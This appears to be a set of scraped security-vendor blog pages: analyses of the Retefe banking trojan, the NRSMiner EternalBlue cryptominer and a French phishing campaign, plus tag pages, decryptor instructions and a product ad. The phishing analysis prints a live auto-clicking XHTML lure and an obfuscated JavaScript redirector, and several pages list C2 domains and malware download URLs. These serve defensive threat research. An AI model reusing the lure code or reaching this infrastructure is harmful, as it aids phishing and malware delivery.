The spam message looks like it’s coming from “Mein A1” info@ from different .ch TLDs with subject lines such as “Ihre Rechnung #123456-AB123456 vom 13/07/2017”. The mail itself is (signed) by A1 Telekom Austria AG. The mail contains two attachments: a zipped Mach-O application, and a .xlsx or .docx document file. The first attachment targets macOS systems, whereas the latter document file installs the malware on Windows systems.

The mail itself doesn’t give any social engineering cues to the victim as to which file to open; moreover, having an Austrian-based telecom company sending Swiss International Airlines related documents is probably more confusing than intriguing.

The text explains that double-clicking opens a larger view of the image – but actually, it runs the malware.

Though the malware is mainly targeting Switzerland with the .ch TLD domain, we found a target configuration also for Austrian banks.

List of Austrian-based targets:

‘*bankaustria.at’, ‘*.bawagpsk.com’, ‘*raiffeisen.at’, ‘*.bawag.com’, ‘www.banking.co.at’, ‘*oberbank.at’, ‘www.oberbank-banking.at’, ‘*.easybank.at’

List of Swiss-based targets:

‘*.postfinance.ch’, ‘cs.directnet.com’, ‘*akb.ch’, ‘*ubs.com’, ‘tb.raiffeisendirect.ch’, ‘*bkb.ch’, ‘*lukb.ch’, ‘*zkb.ch’, ‘*onba.ch’, ‘*gkb.ch’, ‘*bekb.ch’, ‘*zugerkb.ch’, ‘*bcge.ch’, ‘*raiffeisen.ch’, ‘*credit-suisse.com’, ‘*.clientis.ch’, ‘clientis.ch’, ‘*bcvs.ch’, ‘*.cic.ch’, ‘cic.ch’, ‘*baloise.ch’, ‘ukb.ch’, ‘*.ukb.ch’, ‘urkb.ch’, ‘*.urkb.ch’, ‘*eek.ch’, ‘*szkb.ch’, ‘*shkb.ch’, ‘*glkb.ch’, ‘*nkb.ch’, ‘*owkb.ch’, ‘*cash.ch’, ‘*bcf.ch’, ‘ebanking.raiffeisen.ch’, ‘*bcv.ch’, ‘*juliusbaer.com’, ‘*abs.ch’, ‘*bcn.ch’, ‘*blkb.ch’, ‘*bcj.ch’, ‘*zuercherlandbank.ch’, ‘*valiant.ch’, ‘*wir.ch’, ‘*bankthalwil.ch’, ‘*piguetgalland.ch’, ‘*triba.ch’, ‘*inlinea.ch’, ‘*bernerlandbank.ch’, ‘*bancasempione.ch’, ‘*bsibank.com’, ‘*corneronline.ch’, ‘*vermoegenszentrum.ch’, ‘*gobanking.ch’, ‘*slbucheggberg.ch’, ‘*slfrutigen.ch’, ‘*hypobank.ch’, ‘*regiobank.ch’, ‘*rbm.ch’, ‘*hbl.ch’, ‘*ersparniskasse.ch’, ‘*ekr.ch’, ‘*sparkasse-dielsdorf.ch’, ‘*eki.ch’, ‘*bankgantrisch.ch’, ‘*bbobank.ch’, ‘*alpharheintalbank.ch’, ‘*aekbank.ch’, ‘*acrevis.ch’, ‘*credinvest.ch’, ‘*bancazarattini.ch’, ‘*appkb.ch’, ‘*arabbank.ch’, ‘*apbank.ch’, ‘*notenstein-laroche.ch’, ‘*bankbiz.ch’, ‘*bankleerau.ch’, ‘*btv3banken.ch’, ‘*dcbank.ch’, ‘*bordier.com’, ‘*banquethaler.com’, ‘*bankzimmerberg.ch’, ‘*bbva.ch’, ‘*bankhaus-jungholz.ch’, ‘*sparhafen.ch’, ‘*banquecramer.ch’, ‘*banqueduleman.ch’, ‘*bcpconnect.com’, ‘*bil.com’, ‘*vontobel.com’, ‘*pbgate.net’, ‘*bnpparibas.com’, ‘*ceanet.ch’, ‘*ce-riviera.ch’, ‘*cedc.ch’, ‘*cmvsa.ch’, ‘*ekaffoltern.ch’, ‘*glarner-regionalbank.ch’, ‘*cen.ch’, ‘*cbhbank.com’, ‘*coutts.com’, ‘*cimbanque.net’, ‘*cembra.ch’, ‘*commerzbank.com’, ‘*dominickco.ch’, ‘*efginternational.com’, ‘*exane.com’, ‘*falconpb.com’, ‘*gemeinschaftsbank.ch’, ‘*frankfurter-bankgesellschaft.com’, ‘*globalance-bank.com’, ‘*ca-financements.ch’, ‘*hsbcprivatebank.com’, ‘*leihkasse-stammheim.ch’, ‘*incorebank.ch’, ‘*lienhardt.ch’, ‘*mmwarburg.ch’, ‘*maerki-baumann.ch’, ‘*mirabaud.com’, ‘*nordea.ch’, ‘*pbihag.ch’, ‘*rahnbodmer.ch’, ‘*mybancaria.ch’, ‘*reyl.com’, ‘*saanenbank.ch’, ‘*sebgroup.com’, ‘*slguerbetal.ch’, ‘*bankslm.ch’, ‘*neuehelvetischebank.ch’, ‘*slr.ch’, ‘*slwynigen.ch’, ‘*sparkasse.ch’, ‘*umtb.ch’, ‘*trafina.ch’, ‘*ubp.com’

Though the Retefe banking trojan has previously operated in other European countries, such as Sweden and the UK, countries other than Switzerland and Austria were not seen in this campaign.

As a note of historical interest, here’s a list of UK-based banks that were targeted in June 2016:

‘*barclays.co.uk’, ‘*natwest.com’, ‘*nwolb.com’, ‘hsbc.co.uk’, ‘www.hsbc.co.uk’,’*business.hsbc.co.uk’, ‘*santander.co.uk’, ‘*rbsdigital.com’, ‘onlinebusiness.lloydsbank.co.uk’,’*cahoot.com’,’*smile.co.uk’, ‘*co-operativebank.co.uk’, ‘if.com’, ‘*.if.com’, ‘*ulsterbankanytimebanking.co.uk’,’*sainsburysbank.co.uk’, ‘*tescobank.com’

IOCs:

  • https: //www[.]dropbox[.]com/s/azkkyzzo41tk84i/FzF7sEBlz128859.exe?dl=1
    https: //www[.]dropbox[.]com/s/96q0qkrusk5gkp6/HwJoS9VDWh570254.exe?dl=1
  • 6aaoqcl2leiptpvn.onion
    dwylpqieagmgtyjl.onion
    dzi752gjsjbsm6pl.onion
    aztqlm4tslmpgkau.onion
    oq47ekl6jzybts33.onion
  • 2cac780f6de5a8acc3506586c06b1218c33b21b0
    9067894655fecc5e22204488672aa08187f52456
    55666326365bcdc57d2e2ce03e537409281140db
    8a55ad699af46e8dabc8ff986c249ba19dd57a9f
    1072112bd23ef35421e49b7927fcc6b5e3703660
    304011d12d7c2fb6640afffd6e751efeb822b1f8
    b4dddd358d5ca61e511a7f0a6ab2d62cfd7acaf3
    272b564ee9dee4e5748b11e2570ba99be403be52
    6cf4e22806d88a97a8a3b02e7c6d9ae480f253e6
    d26a3b093fcc12356fedf03ef5b4341435148881
    d4ec8873bef322358b23c4acda15dd9660d4164d
    2e3dfc1b5e25e835e0a0d0bb6cdc761c84df49e2
    637889f399620c8558d08619a98f30c55e64eb66
    9d9e4007e9df7cd8dabc57d8492797b4d445d2c8
    a7cab82e0cae7b62c3e04664c30108cebc08c3c9


Articles with similar Tags
#####EOF##### LockerGoga | News from the Lab
Articles with the Tag

#lockergoga

#####EOF##### Mira Decryptor

Mira Decryptor

Decrypt files that were encrypted by Mira ransomware.

<

F-Secure Decryptor for Mira Ransomware

About the Tool

F-Secure Decryptor for Mira Ransomware helps you decrypt files that were encrypted by the ransomware known as Mira.

It is important to run the tool on the specific computer where the files were originally encrypted. This is because the recovery key for each files are calculated from the computer where the files got encrypted.

This tool requires Administrator rights in order to execute properly. 

NOTE: This is an F-Secure Labs support tool. It is provided "as is" without warranty or product support.

Download Mira Decryptor

 

Instructions

  1. Extract the package "F-SecureDecryptorForMiraRansomware.zip" to any folder. Password is "novirus"
  2. On the same folder location where the tool was extracted, open up a command line and run it with "Administrator" privilege.  Here's an example how:
    a. Press "Window" button + "R" together to open up a Run dialogue
    b. Enter this command <runas /user:Administrator "%comspec% /K \"cd %~dp0 \" ">
    c. Change "/user:Administrator" to the actual administrator account of the machine as necessary
    d. Enter the password of the Administrator user
  3. Run the tool "F-SecureDecryptorForMiraRansomware.exe"
  4. The tool prints USAGE and exit if arguments are not provided:
    a. /decrypt - Search for encrypted files and decrypt them
    b. /nolog   - This flag suppresses log file creation
    c. /nobackup - This flag suppresses backup creation
    d. /accepteult -  This flag suppresses the display of the license
  5. The tool will automatically search for all encrypted files in the system and will decrypt the encrypted files.
A video on how the tool works in action is available at https://www.youtube.com/watch?v=WhTKSTQCGqM.

 

#####EOF##### Online security and privacy products | F-Secure

The best protection in the world

F-Secure SAFE is award-winning internet security for all devices. Try now for free!

F-Secure TOTAL

F-Secure TOTAL

  • Internet security, VPN and password management for all devices
  • Manage all computers and mobile devices from one account
  • Try free for 30 days
F-Secure SAFE

F-Secure SAFE

  • Award-winning internet security for all devices
  • Protection against viruses, ransom­ware and unsafe websites
  • Try free for 30 days
F-Secure FREEDOME VPN

F-Secure FREEDOME VPN

  • Become hidden and anonymous online
  • Access geo-blocked content
  • Stay safe on public Wi-Fi

Cyber Security and Privacy Hub

Explore tips on how you can keep your devices safe, your privacy protected and your internet experience smooth.

#####EOF##### XMRig | News from the Lab
Articles with the Tag

#xmrig-2

#####EOF##### Bert | News from the Lab
About

Bert


Latest articles from

Bert

#####EOF##### Twitter_API | News from the Lab
Articles with the Tag

#twitter_api

#####EOF##### NRSMiner updates to newer version | News from the Lab

NRSMiner updates to newer version

More than a year after the world first saw the Eternal Blue exploit in action during the May 2017 WannaCry outbreak, we are still seeing unpatched machines in Asia being infected by malware that uses the exploit to spread. Starting in mid-November 2018, our telemetry reports indicate that the newest version of the NRSMiner cryptominer, which uses the Eternal Blue exploit to propagate to vulnerable systems within a local network, is actively spreading in Asia. Most of the infected systems seen are in Vietnam.

nrsminer_countrystatistics

November-December 2018 telemetry statistics for NRSMiner, by country

In addition to downloading a cryptocurrency miner onto an infected machine, NRSMiner can download updated modules and delete the files and services installed by its own previous versions.

This post provides an analysis of how the latest version of NRSMiner infects a system and finds new vulnerable targets to infect. Recommendations for mitigation measures, IOCs and SHA1s are listed at the end of the post.

 

How NRSMiner spreads

There are 2 methods by which a system can be infected by the newest version of NRSMiner:

  • By downloading the updater module onto a system that is already infected with a previous version of NRSMiner, or:
  • If the system is unpatched (MS17-010) and another system within the intranet has been infected by NRSMiner.

 

Method 1: Infection via the Updater module

First, a system that has been infected with an older version of NRSMiner (and has the wmassrv service running) will connect to tecate[.]traduires[.]com to download an updater module to the %systemroot%\temp folder as tmp[xx].exe, where [xx] is the return value of the GetTickCount() API.

When this updater module is executed, it downloads another file to the same folder from one of a series of hard-coded IP addresses:

nrsminer_ipaddresses

List of IP addresses found in different updater module files

The downloaded file, /x86 or /x64, is saved in the %systemroot%\temp folder as WUDHostUpgrade[xx].exe; again, [xx] is the return value of the GetTickCount() API.

WUDHostUpgrade[xx].exe

The WUDHostUpgrade[xx].exe first checks the mutex {502CBAF5-55E5-F190-16321A4} to determine if the system has already been infected with the latest NRSMiner version. If the system is infected, the WUDHostUpgrade[xx].exe deletes itself. ­Otherwise, it will delete the files MarsTraceDiagnostics.xml, snmpstorsrv.dll, MgmtFilterShim.ini.

Next, the module extracts the following files from its resource section (BIN directory) to the %systemroot%\system32 or %systemroot%\sysWOW64 folder: MarsTraceDiagnostics.xml, snmpstorsrv.dll.

It then copies the values for the CreationTime, LastAccessTime and LastWritetime properties from svchost.exe and updates the same properties for the MarsTraceDiagnostics.xml and snmpstorsrv.dll files with the copied values.

Finally, the WUDHostUpgrade[xx].exe installs a service named snmpstorsrv, with snmpstorsrv.dll registered as servicedll. It then deletes itself.

 

nrsminer_WUDHostUpgradexx_code

Pseudo-code for WUDHostUpgradexx.exe’s actions

 

Snmpstorsrv service

The newly-created Snmpstorsrv service starts under “svchost.exe -k netsvcs” and loads the snmpstorsrv.dll file, which creates multiple threads to perform several malicious activities.

nrsminer_Snmpstorsrv_activities

Snmpstorsrv service’s activities

The service first creates a file named MgmtFilterShim.ini in the %systemroot%\system32 folder, writes ‘+’ in it and modifies its CreationTime, LastAccessTime and LastWritetime properties to have the same values as svchost.exe.

Next, the Snmpstorsrv service extracts malicious URLs and the cryptocurrency miner’s configuration file from MarsTraceDiagnostics.xml.

nrsminer_urls

Malicious URLs and miner configuration details in the MarsTraceDiagnostics.xml file

On a system that is already infected with an older version of NRSMiner, the malware will delete all components of its older version before infecting it with the newer one. To remove the prior version of itself, the newest version refers to a list of services, tasks and files to be deleted that can be found as strings in the snmpstorsrv.dll file;  to remove all older versions, it refers to a list that is found in the MarsTraceDiagnostics.xml file.

nrsminer_delete_list

List of services, tasks, files and folders to be deleted

After all the artifacts of the old versions are deleted, the Snmpstorsrv service checks for any updates to the miner module by connecting to:

  • reader[.]pamphler[.]com/resource
  • handle[.]pamphler[.]com/modules.dat

If an updated miner module is available, it is downloaded and written into the MarsTraceDiagnostics.xml file. Once the new module is downloaded, the old miner file in %systemroot%\system32\TrustedHostex.exe is deleted. The new miner is decompressed in memory and the newly extracted miner configuration data is written into it.

This newly updated miner file is then injected into the svchost.exe to start crypto-mining. If the injection fails, the service instead writes the miner to %systemroot%\system32\TrustedHostex.exe and executes it.

nrsminer_decompressed_miner

The miner decompressed in memory

Next, the Snmpstorsrv service decompresses the wininit.exe file and injects it into svchost.exe. If the injection fails, it writes wininit.exe to %systemroot%\AppDiagnostics\wininit.exe and executes it. The service also opens port 60153 and starts listening.

In two other threads, the service sends out details about the infected system to the following sites:

  • pluck[.]moisture[.]tk – MAC address, IP Address, System Name, Operating System information
  • jump[.]taucepan[.]com – processor and memory specific information

This slideshow requires JavaScript.

System information forwarded to remote sites

Based on the information sent, a new updater file will be downloaded and executed, which will perform the same activities as described in “Updater Module” section above. This updater module can be used to infect systems with any new upcoming version of NRSMiner.

 

Method 2: Infection via Wininit.exe and Exploit

In the latest NRSMiner version, wininit.exe is responsible for handling its exploitation and propagation activities. Wininit.exe decompresses the zipped data in %systemroot%\AppDiagnostics\blue.xml and unzips files to the AppDiagnostics folder. Among the unzipped files is one named svchost.exe, which is the Eternalblue – 2.2.0 exploit executable. It then deletes the blue.xml file and writes 2 new files named x86.dll and x64.dll in the AppDiagnostics folder.

Wininit.exe scans the local network on TCP port 445 to search for other accessible systems. After the scan, it executes the Eternalblue executable file to exploit any vulnerable systems found. Exploit information is logged in the process1.txt file.

If the vulnerable system is successfully exploited, Wininit.exe then executes spoolsv.exe, which is the DoublePulsar – 1.3.1 executable file. This file installs the DoublePulsar backdoor onto the exploited system. Depending on the operating system of the target, either the x86.dll or x64.dll file is then transferred by Wininit.exe and gets injected into the targeted system’s lsass.exe by the spoolsv.exe backdoor.

nrsminer_propagation_method

Propagation method

x86.dll/x64.dll

This file creates a socket connection and gets the MarsTraceDiagnostics.xml file in %systemroot%\system32 folder from the parent infected system. It extracts the snmpstorsrv.dll, then creates and starts the Snmpstorsrv service on the newly infected system, so that it repeats the whole infection cycle and finds other vulnerable machines.

Miner module

NRSMiner uses the XMRig Monero CPU miner to generate units of the Monero cryptocurrency. It runs with one of the following parameters:

nrsminer_miner_parameters

Miner parameters

The following are the switches used in the parameters:

  • -o, –url=URL                  URL of mining server
  • -u, –user=USERNAME username for mining server
  • -p, –pass=PASSWORD  password for mining server
  • -t, –threads=N               number of miner threads
  • –donate-level=N           donate level, default 5% (5 minutes in 100 minutes)
  • –nicehash                      enable nicehash.com support

 

Detection

F-Secure products currently detect and block all variants of this malware, with a variety of detections.

Mitigation recommendations

The following measures can be taken to mitigate the exploitation of the vulnerability targeted by Eternal Blue and prevent an infection from spreading in your environment.

  • For F-Secure products:
    • Ensure that the F-Secure security program is using the latest available database updates.
    • Ensure DeepGuard is turned on in all your corporate endpoints, and F-Secure Security Cloud connection is enabled.
    • Ensure that F-Secure firewall is turned on in its default settings. Alternatively, configure your firewall to properly block 445 in- and outbound traffic within the organization to prevent it from spreading within the local network.
  • For Windows:
    • Use Software Updater or any other available tool to identify endpoints without the Microsoft-issued security fix (4013389) and patch them immediately.
    • Apply the relevant security patches for any Windows systems under your administration based on the guidance given in Microsoft’s Customer Guidance for WannaCrypt attacks.
    • If you are unable to patch it immediately, we recommend that you disable SMBv1 with the steps documented in Microsoft Knowledge Base Article 2696547 to reduce attack surface.

 

Indicator of compromise – IOC:

Sha1s:

32ffc268b7db4e43d661c8b8e14005b3d9abd306 - MarsTraceDiagnostics.xml
07fab65174a54df87c4bc6090594d17be6609a5e - snmpstorsrv.dll
abd64831ad85345962d1e0525de75a12c91c9e55 - AppDiagnostics folder (zip)
4971e6eb72c3738e19c6491a473b6c420dde2b57 - Wininit.exe
e43c51aea1fefb3a05e63ba6e452ef0249e71dd9 – tmpxx.exe
327d908430f27515df96c3dcd180bda14ff47fda – tmpxx.exe
37e51ac73b2205785c24045bc46b69f776586421 - WUDHostUpgradexx.exe
da673eda0757650fdd6ab35dbf9789ba8128f460 - WUDHostUpgradexx.exe
ace69a35fea67d32348fc07e491080fa635cc859 - WUDHostUpgradexx.exe
890377356f1d41d2816372e094b4e4687659a96f - WUDHostUpgradexx.exe
7f1f63feaf79c5f0a4caa5bbc1b9d76b8641181a - WUDHostUpgradexx.exe
9d4d574a01aaab5688b3b9eb4f3df2bd98e9790c - WUDHostUpgradexx.exe
9d7d20e834b2651036fb44774c5f645363d4e051 – x64.dll
641603020238a059739ab4cd50199b76b70304e1 – x86.dll

IP addresses:

167[.]179.79.234
104[.]248.72.247
172[.]105.229.220
207[.]148.110.212
149[.]28.133.197
167[.]99.172.78
181[.]215.176.23
38[.]132.111.23
216[.]250.99.33
103[.]103.128.151

URLs:

c[.]lombriz[.]tk
state[.]codidled[.]com
null[.]exhauest[.]com
take[.]exhauest[.]com
junk[.]soquare[.]com
loop[.]sawmilliner[.]com
fox[.]weilders[.]com
asthma[.]weilders[.]com
reader[.]pamphler[.]com
jump[.]taucepan[.]com
pluck[.]moisture[.]tk
handle[.]pamphler[.]com


Articles with similar Tags
#####EOF##### Th3 Cyb3r | News from the Lab
Articles with the Tag

#th3-cyb3r

#####EOF##### Phishing Campaign targeting French Industry | News from the Lab

Phishing Campaign targeting French Industry

We have recently observed an ongoing phishing campaign targeting the French industry. Among these targets are organizations involved in chemical manufacturing, aviation, automotive, banking, industry software providers, and IT service providers. Beginning October 2018, we have seen multiple phishing emails which follow a similar pattern, similar indicators, and obfuscation with quick evolution over the course of the campaign. This post will give a quick look into how the campaign has evolved, what it is about, and how you can detect it.

Phishing emails

The phishing emails usually refer to some document that could either be an attachment or could supposedly be obtained by visiting the link provided. The use of the French language here appears to be native and very convincing.

The subject of the email follows the prefix of the attachment name. The attachments could be an HTML or a PDF file usually named as “document“, “preuves“, or “fact” which can be followed by underscore and 6 numbers. Here are some of the attachment names we have observed:

  • fact_395788.xht
  • document_773280.xhtml
  • 474362.xhtml
  • 815929.htm
  • document_824250.html
  • 975677.pdf
  • 743558.pdf

Here’s an example content of an XHTML attachment from 15th of November:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta content="UTF-8" />
</head>
<body onload='document.getElementById("_y").click();'>
<h1>
<a id="_y" href="https://t[.]co/8hMB9xwq9f?540820">Lien de votre document</a>
</h1>
</body>
</html>

 

Evolution of the campaign

The first observed phishing emails in the beginning of October contained an unobfuscated payload address. For example:

  • hxxp://piecejointe[.]pro/facture/redirect[.]php
  • hxxp://mail-server-zpqn8wcphgj[.]pw?client=XXXXXX

These links were inside HTML/XHTML/HTM attachments or simply as links in the email body. The attachment names used were mostly document_[randomized number].xhtml.

Towards the end of October these payload addresses were further obfuscated by putting them behind redirects. The author has developed a simple Javascript to obfuscate a bunch of .pw domains.

var _0xa4d9=["\x75\x71\x76\x6B\x38\x66\x74\x75\x77\x35\x69\x74\x38\x64\x73\x67\x6C\x63\x7A\x2E\x70\x77",
"\x7A\x71\x63\x7A\x66\x6E\x32\x6E\x6E\x6D\x75\x65\x73\x68\x38\x68\x74\x79\x67\x2E\x70\x77",
"\x66\x38\x79\x33\x70\x35\x65\x65\x36\x64\x6C\x71\x72\x37\x39\x36\x33\x35\x7A\x2E\x70\x77",
"\x65\x72\x6B\x79\x67\x74\x79\x63\x6F\x6D\x34\x66\x33\x79\x61\x34\x77\x69\x71\x2E\x70\x77",
"\x65\x70\x72\x72\x39\x71\x79\x32\x39\x30\x65\x62\x65\x70\x6B\x73\x6D\x6B\x62\x2E\x70\x77",
"\x37\x62\x32\x64\x75\x74\x62\x37\x76\x39\x34\x31\x34\x66\x6E\x68\x70\x36\x63\x2E\x70\x77",
"\x64\x69\x6D\x76\x72\x78\x36\x30\x72\x64\x6E\x7A\x36\x63\x68\x6C\x77\x6B\x65\x2E\x70\x77",
"\x78\x6D\x76\x6E\x6C\x67\x6B\x69\x39\x61\x39\x39\x67\x35\x6B\x62\x67\x75\x65\x2E\x70\x77",
"\x62\x72\x75\x62\x32\x66\x77\x64\x39\x30\x64\x38\x6D\x76\x61\x70\x78\x6E\x6C\x2E\x70\x77",
"\x68\x38\x39\x38\x6A\x65\x32\x68\x74\x64\x64\x61\x69\x38\x33\x78\x63\x72\x37\x2E\x70\x77",
"\x6C\x32\x6C\x69\x69\x75\x38\x79\x64\x7A\x6D\x64\x66\x30\x31\x68\x69\x63\x72\x2E\x70\x77",
"\x63\x79\x6B\x36\x6F\x66\x6D\x75\x6E\x6C\x35\x34\x72\x36\x77\x6B\x30\x6B\x74\x2E\x70\x77",
"\x7A\x78\x70\x74\x76\x79\x6F\x64\x6A\x39\x35\x64\x77\x63\x67\x6B\x6C\x62\x77\x2E\x70\x77",
"\x35\x65\x74\x67\x33\x6B\x78\x6D\x69\x78\x67\x6C\x64\x73\x78\x73\x67\x70\x65\x2E\x70\x77",
"\x38\x35\x30\x6F\x6F\x65\x70\x6F\x6C\x73\x69\x71\x34\x6B\x71\x6F\x70\x6D\x65\x2E\x70\x77",
"\x6F\x6D\x63\x36\x75\x32\x6E\x31\x30\x68\x38\x6E\x61\x71\x72\x30\x61\x70\x68\x2E\x70\x77",
"\x63\x30\x7A\x65\x68\x62\x74\x38\x6E\x77\x67\x6F\x63\x35\x63\x6E\x66\x33\x30\x2E\x70\x77",
"\x68\x36\x6A\x70\x64\x6B\x6E\x7A\x76\x79\x63\x61\x36\x6A\x67\x33\x30\x78\x74\x2E\x70\x77",
"\x74\x64\x32\x6E\x62\x7A\x6A\x6D\x67\x6F\x36\x73\x6E\x65\x6E\x6A\x7A\x70\x72\x2E\x70\x77",
"\x6C\x69\x70\x71\x76\x77\x78\x63\x73\x63\x34\x75\x68\x6D\x6A\x36\x74\x6D\x76\x2E\x70\x77",
"\x31\x33\x72\x7A\x61\x75\x30\x69\x64\x39\x79\x76\x37\x71\x78\x37\x76\x6D\x78\x2E\x70\x77",
"\x6B\x64\x33\x37\x68\x62\x6F\x6A\x67\x6F\x65\x76\x6F\x63\x6C\x6F\x7A\x77\x66\x2E\x70\x77",
"\x66\x75\x67\x65\x39\x69\x6F\x63\x74\x6F\x38\x39\x63\x6B\x36\x7A\x62\x30\x76\x2E\x70\x77",
"\x70\x6D\x63\x35\x6B\x71\x6C\x78\x6C\x62\x6C\x78\x30\x65\x67\x74\x63\x37\x32\x2E\x70\x77",
"\x30\x71\x38\x31\x73\x73\x72\x74\x68\x69\x72\x63\x69\x62\x70\x6A\x62\x33\x38\x2E\x70\x77","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x68\x74\x74\x70\x3A\x2F\x2F","\x72\x65\x70\x6C\x61\x63\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];
var arr=[_0xa4d9[0],_0xa4d9[1],_0xa4d9[2],_0xa4d9[3],_0xa4d9[4],_0xa4d9[5],_0xa4d9[6],_0xa4d9[7],_0xa4d9[8],_0xa4d9[9],_0xa4d9[10],_0xa4d9[11],_0xa4d9[12],_0xa4d9[13],_0xa4d9[14],_0xa4d9[15],_0xa4d9[16],_0xa4d9[17],_0xa4d9[18],_0xa4d9[19],_0xa4d9[20],_0xa4d9[21],_0xa4d9[22],_0xa4d9[23],_0xa4d9[24]];
var redir=arr[Math[_0xa4d9[27]](Math[_0xa4d9[25]]()* arr[_0xa4d9[26]])];
window[_0xa4d9[30]][_0xa4d9[29]](_0xa4d9[28]+ redir)

This Javascript code, which was part of the attachment, deobfuscated an array of [random].pw domains that redirected the users to the payload domain. In this particular campaign, the payload domain has changed to hxxp://email-document-joint[.]pro/redir/.

However, it appears that the use of Javascript code inside attachments was not a huge success as only some days later, the Javascript code for domain deobfuscation and redirection has been moved behind pste.eu, a Pastebin-like service for HTML code. So then the phishing emails thereafter contained links to pste.eu such as hxxps[://]pste[.]eu/p/yGqK[.]html.

In the next iteration of evolution during November, we observed few different styles. Some emails contained links to subdomains of random .pw or .site domains such as:

  • hxxp://6NZX7M203U[.]p95jadah5you6bf1dpgm[.]pw
  • hxxp://J8EOPRBA7E[.]jeu0rgf5apd5337[.]site.

At this point .PDF files were also seen in the phishing emails as attachments. Those PDFs contained similar links to a random subdomain in .site or .website domains.

Few days later at 15th of November, the attackers continued to add redirections in between the pste.eu URLs by using Twitter shortened URLs. They used a Twitter account to post 298 pste.eu URLs and then included the t.co equivalents into their phishing emails. The Twitter account appears to be some sort of advertising account with very little activity since its creation in 2012. Most of the tweets and retweets are related to Twitter advertisement campaigns or products/lotteries etc.

 

The pste.eu links in Twitter

 

Example of the URL redirections

The latest links used in the campaign are random .icu domains leading to 302 redirection chain. The delivery method remained as XHTML/HTML attachments or links in the emails. The campaign appears to be evolving fairly quickly and the attackers are active in generating new domains and new ways of redirection and obfuscation. At the time of writing, it seems the payload URLs lead to an advertising redirection chain with multiple different domains and URLs known for malvertising.

 

Infrastructure

The campaign has been observed using mostly compromised Wanadoo email accounts and later email accounts in their own domains such as: rault@3130392E3130322E37322E3734.lho33cefy1g.pw to send out the emails. The subdomain name is the name of the sending email server and is a hex representation of the public IP address of the server, in this case: 109.102.72.74.

The server behind the .pw domain appears to be a postfix email server listed already on multiple blacklists. For compromised email accounts used for sending out the phishing emails, they are always coming from .fr domains.

The links in the emails go through multiple URLs in redirection chains and most of the websites are hosted in the same servers.

Following the redirections after the payload domains (e.g. email-document-joint[.]pro or .pw payload domains) later in November, we get redirected to domains such as ffectuermoi[.]tk or eleverqualit[.]tk. These were hosted on the same servers with a lot of similar looking domains. Closer investigation of these servers revealed that they were known for hosting PUP/Adware programs and more malvertising URLs.

Continuing on to ffectuermoi[.]tk domain would eventually lead to doesok[.]top, which serves advertisements while setting cookies along the way. The servers hosting doesok[.]top are also known for hosting PUP/adware/malware.

 

Additional Find

During the investigation we came across an interesting artifact in Virustotal submitted from France. The file is a .zip archive that contained the following

  • All in One Checker” tool – a tool that can be used to verify email account/password dumps for valid accounts/combinations
  • .vbs dropper – a script that drops a backdoor onto the user’s system upon executing the checker tool
  • Directory created by the checker tool – named with the current date and time of the tool execution that contains results in these text files:
    • Error.txt – contains any errors
    • Good.txt – verified results
    • Ostatok.txt – Ostatok means “the rest” or “remainder”

Contents of the .zip file. 03.10_17:55 is the directory created by the tool containing the checker results. Both .vbs are exactly the same backdoor dropper. The rest are configuration files and the checker tool itself.

 

Contents of the directory created by the checker tool

Almost all of the email accounts inside these .txt files are from .fr domains, and one of them is actually the same address we saw used as a sender in one of the phishing emails in 19th of October. Was this tool used by the attackers behind this campaign? It seems rather fitting.

But what caused them to ZIP up this tool along with the results to Virustotal?

When opening the All In One Checker tool, you are greeted with a lovely message and pressing continue will attempt to install the backdoor.

We replaced the .vbs dropper with Wscript.Echo() alert

 

Hey great!

Perhaps they wanted to check the files because they accidentally infected themselves with a backdoor.

 

Indicators

This is a non-exhaustive list of indicators observed during the campaign.

2bv9npptni4u46knazx2.pw
p95jadah5you6bf1dpgm.pw
lho33cefy1g.pw
mail-server-zpqn8wcphgj.pw
http://piecejointe.pro/facture/redirect.php
http://email-document-joint.pro/redir/
l45yvbz21a.website
95plb963jjhjxd.space
sjvmrvovndqo2u.icu
jeu0rgf5apd5337.site
95.222.24.44 - Email Server
109.102.72.74 - Email Server
83.143.150.210 - Email Server
37.60.177.228 - Web Server / Malware C2  
87.236.22.87 Web Server / Malware C2 
207.180.233.109 - Web Server
91.109.5.170 - Web Server
162.255.119.96 - Web Server
185.86.78.238 - Web Server
176.119.157.62 - Web Server
113.181.61.226

The following indicators have been observed but are benign and can cause false positives.

https://pste.eu
https://t.co
Tags:


Articles with similar Tags
#####EOF#####